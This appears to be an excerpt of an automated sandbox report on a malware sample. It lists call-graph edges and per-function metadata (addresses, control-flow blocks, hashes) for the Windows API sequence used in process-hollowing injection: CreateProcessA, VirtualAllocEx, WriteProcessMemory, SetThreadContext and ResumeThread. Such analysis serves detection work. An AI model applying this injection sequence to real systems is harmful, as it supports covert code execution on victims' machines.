ResumeThread 38519->38521 38522 86afe30 ResumeThread 38519->38522 38520->38429 38521->38519 38522->38519 38524 2e62ed8 38523->38524 38525 2e62eea 38524->38525 38526 86afe38 ResumeThread 38524->38526 38527 86afe30 ResumeThread 38524->38527 38525->38429 38526->38524 38527->38524 38529 2e62ed8 38528->38529 38529->38528 38530 2e62eea 38529->38530 38531 86afe38 ResumeThread 38529->38531 38532 86afe30 ResumeThread 38529->38532 38530->38429 38531->38529 38532->38529 38535 2e62ca0 38533->38535 38534 2e62d6e 38534->38429 38535->38534 38612 2e60cc7 38535->38612 38616 2e60cd0 38535->38616 38540 2e6327d 38539->38540 38542 2e60980 VirtualAllocEx 38540->38542 38543 2e60988 VirtualAllocEx 38540->38543 38541 2e63885 38541->38541 38542->38541 38543->38541 38546 2e62cd3 38544->38546 38545 2e62d6e 38545->38429 38546->38545 38548 2e60cc7 CreateProcessA 38546->38548 38549 2e60cd0 CreateProcessA 38546->38549 38547 2e62ead 38547->38429 38548->38547 38549->38547 38552 2e60a45 WriteProcessMemory 38550->38552 38553 2e60a48 WriteProcessMemory 38550->38553 38551 2e635e4 38552->38551 38553->38551 38555 2e62ed8 38554->38555 38556 2e62eea 38555->38556 38557 86afe38 ResumeThread 38555->38557 38558 86afe30 ResumeThread 38555->38558 38556->38429 38557->38555 38558->38555 38560 2e630a6 38559->38560 38563 2e60a45 WriteProcessMemory 38560->38563 38564 2e60a48 WriteProcessMemory 38560->38564 38561 2e62ed8 38562 2e62eea 38561->38562 38565 86afe38 ResumeThread 38561->38565 38566 86afe30 ResumeThread 38561->38566 38562->38429 38563->38561 38564->38561 38565->38561 38566->38561 38568 2e6326b 38567->38568 38570 2e60980 VirtualAllocEx 38568->38570 38571 2e60988 VirtualAllocEx 38568->38571 38569 2e63885 38570->38569 38571->38569 38573 2e60a48 WriteProcessMemory 38572->38573 38575 2e60ae7 38573->38575 38575->38486 38577 2e60a90 WriteProcessMemory 38576->38577 38579 2e60ae7 38577->38579 38579->38486 38581 86afe38 ResumeThread 38580->38581 38583 86afea9 38581->38583 38583->38491 38585 86afe78 ResumeThread 38584->38585 38587 86afea9 38585->38587 38587->38491 38589 2e604bd Wow64SetThreadContext 38588->38589 38591 2e60505 38589->38591 38591->38506 38593 2e604bd Wow64SetThreadContext 38592->38593 38595 2e60505 38593->38595 38595->38506 38597 2e60988 VirtualAllocEx 38596->38597 38599 2e60a05 38597->38599 38599->38511 38601 2e609c8 VirtualAllocEx 38600->38601 38603 2e60a05 38601->38603 38603->38511 38605 2e60b38 ReadProcessMemory 38604->38605 38607 2e60bc7 38605->38607 38607->38515 38609 2e60b83 ReadProcessMemory 38608->38609 38611 2e60bc7 38609->38611 38611->38515 38613 2e60ccb CreateProcessA 38612->38613 38615 2e60f1b 38613->38615 38617 2e60d37 CreateProcessA 38616->38617 38619 2e60f1b 38617->38619 38620 2e63af0 38621 2e63c7b 38620->38621 38622 2e63b16 38620->38622 38622->38621 38625 2e63d68 PostMessageW 38622->38625 38627 2e63d70 PostMessageW 38622->38627 38626 2e63ddc 38625->38626 38626->38622 38628 2e63ddc 38627->38628 38628->38622 38629 7f66110 38631 7f66141 38629->38631 38630 7f66159 38631->38630 38635 7f66cc8 38631->38635 38638 7f66cb8 38631->38638 38632 7f6626c 38642 7f65754 38635->38642 38639 7f66cc8 38638->38639 38640 7f65754 DrawTextExW 38639->38640 38641 7f66ce5 38640->38641 38641->38632 38643 7f66d00 DrawTextExW 38642->38643 38645 7f66ce5 38643->38645 38645->38632 38646 7f67540 38647 7f6757a 38646->38647 38648 7f675f6 38647->38648 38649 7f6760b 38647->38649 38654 7f657dc 38648->38654 38651 7f657dc 3 API calls 38649->38651 38653 7f6761a 38651->38653 38656 7f657e7 38654->38656 38655 7f67601 38656->38655 38659 7f68368 38656->38659 38665 7f68358 38656->38665 38671 7f67f54 38659->38671 38662 7f6838f 38662->38655 38663 7f683a7 CreateIconFromResourceEx 38664 7f68436 38663->38664 38664->38655 38666 7f68382 38665->38666 38667 7f67f54 CreateIconFromResourceEx 38665->38667 38668 7f6838f 38666->38668 38669 7f683a7 CreateIconFromResourceEx 38666->38669 38667->38666 38668->38655 38670 7f68436 38669->38670 38670->38655 38672 7f683b8 CreateIconFromResourceEx 38671->38672 38673 7f68382 38672->38673 38673->38662 38673->38663 38397 3049c48 38399 3049c5f 38397->38399 38398 3049d35 38399->38398 38401 3049d61 38399->38401 38402 3049d82 38401->38402 38403 3049d8d 38402->38403 38405 3049e59 38402->38405 38403->38399 38406 3049e7d 38405->38406 38410 304a360 38406->38410 38414 304a370 38406->38414 38412 304a397 38410->38412 38411 304a474 38411->38411 38412->38411 38418 3049fbc 38412->38418 38416 304a397 38414->38416 38415 304a474 38415->38415 38416->38415 38417 3049fbc CreateActCtxA 38416->38417 38417->38415 38419 304b400 CreateActCtxA 38418->38419 38421 304b4c3 38419->38421 38674 7f66e88 38676 7f66ec7 38674->38676 38678 7f66ecb 38676->38678 38679 7f644e8 38676->38679 38677 7f66fd5 38681 7f64509 38679->38681 38680 7f6451e 38680->38677 38681->38680 38684 7f63514 DrawTextExW 38681->38684 38683 7f64589 38684->38683

                                                                                                                                  Executed Functions

                                                                                                                                  Function 02E60CC7 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1369 2e60cc7-2e60cc9 1370 2e60d37-2e60d65 1369->1370 1371 2e60ccb-2e60d34 1369->1371 1373 2e60d67-2e60d71 1370->1373 1374 2e60d9e-2e60dbe 1370->1374 1371->1370 1373->1374 1375 2e60d73-2e60d75 1373->1375 1381 2e60df7-2e60e26 1374->1381 1382 2e60dc0-2e60dca 1374->1382 1376 2e60d77-2e60d81 1375->1376 1377 2e60d98-2e60d9b 1375->1377 1379 2e60d85-2e60d94 1376->1379 1380 2e60d83 1376->1380 1377->1374 1379->1379 1383 2e60d96 1379->1383 1380->1379 1390 2e60e5f-2e60f19 CreateProcessA 1381->1390 1391 2e60e28-2e60e32 1381->1391 1382->1381 1384 2e60dcc-2e60dce 1382->1384 1383->1377 1385 2e60dd0-2e60dda 1384->1385 1386 2e60df1-2e60df4 1384->1386 1388 2e60dde-2e60ded 1385->1388 1389 2e60ddc 1385->1389 1386->1381 1388->1388 1392 2e60def 1388->1392 1389->1388 1402 2e60f22-2e60fa8 1390->1402 1403 2e60f1b-2e60f21 1390->1403 1391->1390 1393 2e60e34-2e60e36 1391->1393 1392->1386 1395 2e60e38-2e60e42 1393->1395 1396 2e60e59-2e60e5c 1393->1396 1397 2e60e46-2e60e55 1395->1397 1398 2e60e44 1395->1398 1396->1390 1397->1397 1400 2e60e57 1397->1400 1398->1397 1400->1396 1413 2e60faa-2e60fae 1402->1413 1414 2e60fb8-2e60fbc 1402->1414 1403->1402 1413->1414 1415 2e60fb0 1413->1415 1416 2e60fbe-2e60fc2 1414->1416 1417 2e60fcc-2e60fd0 1414->1417 1415->1414 1416->1417 1418 2e60fc4 1416->1418 1419 2e60fd2-2e60fd6 1417->1419 1420 2e60fe0-2e60fe4 1417->1420 1418->1417 1419->1420 1421 2e60fd8 1419->1421 1422 2e60ff6-2e60ffd 1420->1422 1423 2e60fe6-2e60fec 1420->1423 1421->1420 1424 2e61014 1422->1424 1425 2e60fff-2e6100e 1422->1425 1423->1422 1427 2e61015 1424->1427 1425->1424 1427->1427
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02E60F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 7d73dfc6526db20b9e740a87f264e953c374b1c96e673dc9e9fe6b4b28a31c04
                                                                                                                                  • Instruction ID: 620d9592448f5b587ffec4b91ad122f4ee66e7ef6ac96ea164801a7382800e99
                                                                                                                                  • Opcode Fuzzy Hash: 7d73dfc6526db20b9e740a87f264e953c374b1c96e673dc9e9fe6b4b28a31c04
                                                                                                                                  • Instruction Fuzzy Hash: E491AE71D40229DFDF10CFA8C844BEEBBB2BF48354F0495A9E809A7254DB759981CF91
                                                                                                                                  Function 02E60CD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1428 2e60cd0-2e60d65 1431 2e60d67-2e60d71 1428->1431 1432 2e60d9e-2e60dbe 1428->1432 1431->1432 1433 2e60d73-2e60d75 1431->1433 1439 2e60df7-2e60e26 1432->1439 1440 2e60dc0-2e60dca 1432->1440 1434 2e60d77-2e60d81 1433->1434 1435 2e60d98-2e60d9b 1433->1435 1437 2e60d85-2e60d94 1434->1437 1438 2e60d83 1434->1438 1435->1432 1437->1437 1441 2e60d96 1437->1441 1438->1437 1448 2e60e5f-2e60f19 CreateProcessA 1439->1448 1449 2e60e28-2e60e32 1439->1449 1440->1439 1442 2e60dcc-2e60dce 1440->1442 1441->1435 1443 2e60dd0-2e60dda 1442->1443 1444 2e60df1-2e60df4 1442->1444 1446 2e60dde-2e60ded 1443->1446 1447 2e60ddc 1443->1447 1444->1439 1446->1446 1450 2e60def 1446->1450 1447->1446 1460 2e60f22-2e60fa8 1448->1460 1461 2e60f1b-2e60f21 1448->1461 1449->1448 1451 2e60e34-2e60e36 1449->1451 1450->1444 1453 2e60e38-2e60e42 1451->1453 1454 2e60e59-2e60e5c 1451->1454 1455 2e60e46-2e60e55 1453->1455 1456 2e60e44 1453->1456 1454->1448 1455->1455 1458 2e60e57 1455->1458 1456->1455 1458->1454 1471 2e60faa-2e60fae 1460->1471 1472 2e60fb8-2e60fbc 1460->1472 1461->1460 1471->1472 1473 2e60fb0 1471->1473 1474 2e60fbe-2e60fc2 1472->1474 1475 2e60fcc-2e60fd0 1472->1475 1473->1472 1474->1475 1476 2e60fc4 1474->1476 1477 2e60fd2-2e60fd6 1475->1477 1478 2e60fe0-2e60fe4 1475->1478 1476->1475 1477->1478 1479 2e60fd8 1477->1479 1480 2e60ff6-2e60ffd 1478->1480 1481 2e60fe6-2e60fec 1478->1481 1479->1478 1482 2e61014 1480->1482 1483 2e60fff-2e6100e 1480->1483 1481->1480 1485 2e61015 1482->1485 1483->1482 1485->1485
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02E60F06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: 85575ffd09942816d01a96f425b4ad9c668d4a9882de08e6d6202941ae625a9f
                                                                                                                                  • Instruction ID: 30aa7900cd971964f4f9360b44f6b703907f326ba94773f37047f100e3fa5a6d
                                                                                                                                  • Opcode Fuzzy Hash: 85575ffd09942816d01a96f425b4ad9c668d4a9882de08e6d6202941ae625a9f
                                                                                                                                  • Instruction Fuzzy Hash: 52919D71D40229DFDF10CFA8C844BEEBBB2BF48314F1495A9E809A7280DB759981CF91
                                                                                                                                  Function 0304B3F5 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1611 304b3f5-304b4c1 CreateActCtxA 1613 304b4c3-304b4c9 1611->1613 1614 304b4ca-304b524 1611->1614 1613->1614 1621 304b526-304b529 1614->1621 1622 304b533-304b537 1614->1622 1621->1622 1623 304b548 1622->1623 1624 304b539-304b545 1622->1624 1626 304b549 1623->1626 1624->1623 1626->1626
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 0304B4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877233416.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_3040000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: 4ddf8794dbabaae67a849d2fd48dc74c89fc9d56d40a235474a9e3a4874cd02a
                                                                                                                                  • Instruction ID: b6535e9e0e50fc923f6fa5a38a850b613e452b40714db92871dc4a7768d0cff9
                                                                                                                                  • Opcode Fuzzy Hash: 4ddf8794dbabaae67a849d2fd48dc74c89fc9d56d40a235474a9e3a4874cd02a
                                                                                                                                  • Instruction Fuzzy Hash: 3F41F0B0C01619CFDB24DFA9C944B9DFBF5BF48304F24816AD408AB255DB75A986CF90
                                                                                                                                  Function 03049FBC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1594 3049fbc-304b4c1 CreateActCtxA 1597 304b4c3-304b4c9 1594->1597 1598 304b4ca-304b524 1594->1598 1597->1598 1605 304b526-304b529 1598->1605 1606 304b533-304b537 1598->1606 1605->1606 1607 304b548 1606->1607 1608 304b539-304b545 1606->1608 1610 304b549 1607->1610 1608->1607 1610->1610
                                                                                                                                  APIs
                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 0304B4B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877233416.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_3040000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                  • Opcode ID: d38922f7ce6c4981899f7a18cccb084d2b738fcf3009e88d37d20b44e9c45aa6
                                                                                                                                  • Instruction ID: 99f38c0e5b9780db9ccfc4cd74ca109c220c5280bb67f490ee506de249579f35
                                                                                                                                  • Opcode Fuzzy Hash: d38922f7ce6c4981899f7a18cccb084d2b738fcf3009e88d37d20b44e9c45aa6
                                                                                                                                  • Instruction Fuzzy Hash: E741EDB0C0061DCADB24DFA9D844B8EBBF5BF48304F24806AD408AB255DBB5A985CF90
                                                                                                                                  Function 07F68368 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                  • Opcode ID: febd43c3846e67b4119f8d51ba037683f975c4cbb4d8696774de6df5c8b1d302
                                                                                                                                  • Instruction ID: 60e602d5a52408190ee3b8b01796fe998902b8f8ba0a502ce8ee46094565a904
                                                                                                                                  • Opcode Fuzzy Hash: febd43c3846e67b4119f8d51ba037683f975c4cbb4d8696774de6df5c8b1d302
                                                                                                                                  • Instruction Fuzzy Hash: 2C317AB19043999FCB12DFA9D844AEEBFF4EF09310F18805AF954AB221C3359950DFA1
                                                                                                                                  Function 07F66CF9 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07F66CE5,?,?), ref: 07F66D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                  • Opcode ID: d615a12f5cd50401f6e7541e5a616c05e989ab1c5b96301d11e5ae05e183a162
                                                                                                                                  • Instruction ID: 9ba5c7c5b569f2ee9ca912dba3e0557768f3b0efb021ba74a0f0349662da54ee
                                                                                                                                  • Opcode Fuzzy Hash: d615a12f5cd50401f6e7541e5a616c05e989ab1c5b96301d11e5ae05e183a162
                                                                                                                                  • Instruction Fuzzy Hash: 8C31D2B5D002499FDB10DF9AD884ADEFBF4FF48320F18842AE919A7610D775A954CFA0
                                                                                                                                  Function 07F65754 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07F66CE5,?,?), ref: 07F66D97
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DrawText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                  • Opcode ID: 7a7736d3de378fd809fdaf5b02e6cecb2c31e19375025f0a40bc6f957e5023c1
                                                                                                                                  • Instruction ID: cb5973e458100c4df265ed95798ccc60a2cd4b982b91c9282b9fd882635db492
                                                                                                                                  • Opcode Fuzzy Hash: 7a7736d3de378fd809fdaf5b02e6cecb2c31e19375025f0a40bc6f957e5023c1
                                                                                                                                  • Instruction Fuzzy Hash: 2331C3B5D00249AFDB10DF9AD884ADEFBF4FB48310F14842AE919E7210D774A954CFA4
                                                                                                                                  Function 02E60A45 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02E60AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: ec137c1bfebba705380e542f55cf2c9fcdf123d22aa46cff13968b0990f30d3c
                                                                                                                                  • Instruction ID: 528820dcc7bce4b859b8690951cce9d06aee3f11db3183d0b184d3638d005702
                                                                                                                                  • Opcode Fuzzy Hash: ec137c1bfebba705380e542f55cf2c9fcdf123d22aa46cff13968b0990f30d3c
                                                                                                                                  • Instruction Fuzzy Hash: 8C2177B19003199FCF00DFA9C984BEEBBF5FF48314F10842AE958A7240C778A940CBA0
                                                                                                                                  Function 02E60A48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02E60AD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                  • Opcode ID: 4764b46ccce1c68f92f1103ae29b25a191e7cdac0518c9c392a1e68757a5c311
                                                                                                                                  • Instruction ID: 6acc5581f017f2f798c48774b54be84c85a59fd07408de123d7001c9cf1a42cd
                                                                                                                                  • Opcode Fuzzy Hash: 4764b46ccce1c68f92f1103ae29b25a191e7cdac0518c9c392a1e68757a5c311
                                                                                                                                  • Instruction Fuzzy Hash: 832157B19003599FCF10DFA9C985BEEBBF5FF48314F108429E959A7250C778A944CBA0
                                                                                                                                  Function 02E60470 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02E604F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 3bec345dc21e63a490413780b84cac3f89196d7faa9a03b87bd3974b7dd47d81
                                                                                                                                  • Instruction ID: 3e6d109ca21dd6241c8bf08f715f0de128a2517f4cdab26908780435e878672a
                                                                                                                                  • Opcode Fuzzy Hash: 3bec345dc21e63a490413780b84cac3f89196d7faa9a03b87bd3974b7dd47d81
                                                                                                                                  • Instruction Fuzzy Hash: 742157B19002598FDB10DFAAC5857EEBFF4AB88324F14C429D459A7251CB78A944CFA0
                                                                                                                                  Function 02E60B34 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E60BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  • Opcode ID: b4c7147fd5b3bbe25c6231f7c75d6c035369855e9c930cbf3cc6b8cec7b8df23
                                                                                                                                  • Instruction ID: 142462698dc0274700e56fb1ff995877e04dc5a2931432b47d994ae5227c49d9
                                                                                                                                  • Opcode Fuzzy Hash: b4c7147fd5b3bbe25c6231f7c75d6c035369855e9c930cbf3cc6b8cec7b8df23
                                                                                                                                  • Instruction Fuzzy Hash: 052148B18003599FCB10DFAAC985AEEBBF5FF48324F108429E559A7250D7389540CBA0
                                                                                                                                  Function 02E60B38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02E60BB8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                  • Opcode ID: 05d5db0708a87247c66f87347e7cef2fd797263609a7f0e783603d7f245bdee6
                                                                                                                                  • Instruction ID: b5ccb66c71946428f39d7264e540935fd522a57b349a1ae899b3ec645901f03b
                                                                                                                                  • Opcode Fuzzy Hash: 05d5db0708a87247c66f87347e7cef2fd797263609a7f0e783603d7f245bdee6
                                                                                                                                  • Instruction Fuzzy Hash: E82128B19003599FCB10DFAAC985AEEBBF5FF48324F108429E559A7250D7389544CBA4
                                                                                                                                  Function 02E60478 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02E604F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                  • Opcode ID: 25621056725cb9800f6a348e606cae4952f9751ea2b5d30812f792505f160ec8
                                                                                                                                  • Instruction ID: b7fb5424aca70d080f623a6feee566bc85a0f90e7c09bcba6d1fab8ab03429f6
                                                                                                                                  • Opcode Fuzzy Hash: 25621056725cb9800f6a348e606cae4952f9751ea2b5d30812f792505f160ec8
                                                                                                                                  • Instruction Fuzzy Hash: 602118719003198FDB10DFAAC5857EEBBF4EF48364F14C429D459A7241C778A944CFA4
                                                                                                                                  Function 07F67F54 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07F68382,?,?,?,?,?), ref: 07F68427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1883196627.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_7f60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                  • Opcode ID: 572717479a80ee652f6a5c9b03d41e2c15071723366ea84ab093ac2a4db801be
                                                                                                                                  • Instruction ID: eb10ad44e07951feb042a469b4f182e89195a83ee519d9b1913dc6073d71944f
                                                                                                                                  • Opcode Fuzzy Hash: 572717479a80ee652f6a5c9b03d41e2c15071723366ea84ab093ac2a4db801be
                                                                                                                                  • Instruction Fuzzy Hash: E41179B1804349DFCB10DF9AD888BDEBFF8EB48360F14841AE954A7210C335A950CFA4
                                                                                                                                  Function 02E60980 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02E609F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 73578e5bc696c93b1c3f565c738e5a73044f42f026141d5a1b3c66ea4409cf97
                                                                                                                                  • Instruction ID: bf29db6d0cae8a61f2a03af6ac23344cd6006f4629e47b9ad52cd1203c636df7
                                                                                                                                  • Opcode Fuzzy Hash: 73578e5bc696c93b1c3f565c738e5a73044f42f026141d5a1b3c66ea4409cf97
                                                                                                                                  • Instruction Fuzzy Hash: BC1126729002499FCB10DFAAC945BEFBFF5EB88324F108819E559A7250C775A944CFA4
                                                                                                                                  Function 02E60988 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02E609F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.1877038784.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_2e60000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 9b149557d136fed973e3969358a78099a5e919381c152c4b3ba6a00eaeb7b50e
